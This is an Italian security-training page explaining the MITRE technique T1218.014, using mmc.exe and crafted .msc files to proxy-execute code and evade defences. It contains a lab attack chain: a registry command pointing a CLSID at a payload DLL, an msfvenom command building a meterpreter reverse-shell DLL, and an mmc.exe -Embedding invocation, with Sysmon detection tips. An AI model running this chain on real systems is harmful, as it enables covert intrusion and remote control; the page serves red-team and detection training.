Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Aprile! Scopri di più
La tecnica T1218.014 sfrutta il binario legittimo mmc.exe — firmato Microsoft e presente su ogni installazione Windows — come proxy per eseguire codice malevolo attraverso file .msc personalizzati. Si colloca nella tattica Defense Evasion (TA0005), dove l'obiettivo dell'avversario è aggirare i controlli di sicurezza nascondendosi dietro un processo ritenuto affidabile.
Il meccanismo è elegante nella sua semplicità: MMC, la Microsoft Management Console, è lo strumento nativo per gestire snap-in amministrativi come Group Policy Editor, Computer Management e decine di altri pannelli di configurazione. Poiché i security tool tendono a fidarsi dei processi firmati Microsoft, l'esecuzione di payload tramite mmc.exe elude frequentemente le policy di application control e i filtri euristici degli EDR meno maturi.
Il vettore più insidioso coinvolge la registrazione di un CLSID malevolo nel registro di sistema, associato a uno snap-in "Link to Web Address" all'interno di un file .msc artigianale. L'invocazione con il flag -Embedding attiva il payload COM senza interazione grafica visibile all'utente. La pericolosità è amplificata dal fatto che questa tecnica è stata osservata in 1 campagna documentata e impiegata da 1 gruppo APT, con 2 mitigazioni formali disponibili — un rapporto che suggerisce uno squilibrio tra adozione offensiva crescente e copertura difensiva ancora limitata.
L'obiettivo in laboratorio è dimostrare che mmc.exe può eseguire codice arbitrario senza che i controlli difensivi dell'organizzazione alzino un singolo alert. La catena d'attacco si articola in tre fasi: preparazione del payload COM, costruzione del file .msc e invocazione del proxy.
Fase 1 — Registrazione del CLSID malevolo. Si crea una chiave di registro che punta a una DLL controllata dall'attaccante. In un laboratorio con privilegi amministrativi, il comando PowerShell è diretto:
New-Item -Path "HKCU:\Software\Classes\CLSID{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" -Value "C:\temp\payload.dll" -Force
Il CLSID è arbitrario; l'importante è che sia univoco e non collida con COM object legittimi. La DLL può essere generata con msfvenom (open source, parte di Metasploit Framework):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 -f dll -o payload.dll
Fase 2 — Creazione del file .msc. Apri MMC in author mode con mmc.exe /a, aggiungi lo snap-in "Link to Web Address" dal menu File → Add/Remove Snap-in, inserisci un URL fittizio e salva il file come test.msc. A questo punto, modifica manualmente l'XML del file .msc sostituendo il riferimento allo snap-in con il CLSID malevolo registrato al passo precedente. Alternativamente, tool come GadgetToJScript (open source) possono automatizzare la serializzazione del payload nel formato corretto.
Fase 3 — Esecuzione proxy. Il comando di attivazione è:
mmc.exe -Embedding C:\temp\test.msc
Il flag -Embedding è il segnale chiave: istruisce MMC ad avviare il COM server in modalità embedded, senza interfaccia grafica. In Sysmon, il processo apparirà come figlio legittimo di svchost.exe o del processo chiamante.
Per simulare lo scenario di lateral movement osservato con Medusa Group, prova anche:
mmc.exe compmgmt.msc /computer:
Questo comando apre Computer Management puntando a un host remoto — un pattern che in un ambiente compromesso consente di interagire con dischi, servizi e utenti della macchina bersaglio senza deploy di agenti.
Il framework Atomic Red Team (open source) include test atomici per T1218.014 che automatizzano queste fasi. Integra la simulazione con Sysmon (gratuito) configurato per catturare EventCode 1 (Process Create) e EventCode 7 (Image Loaded), così il blue team potrà validare le proprie detection.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo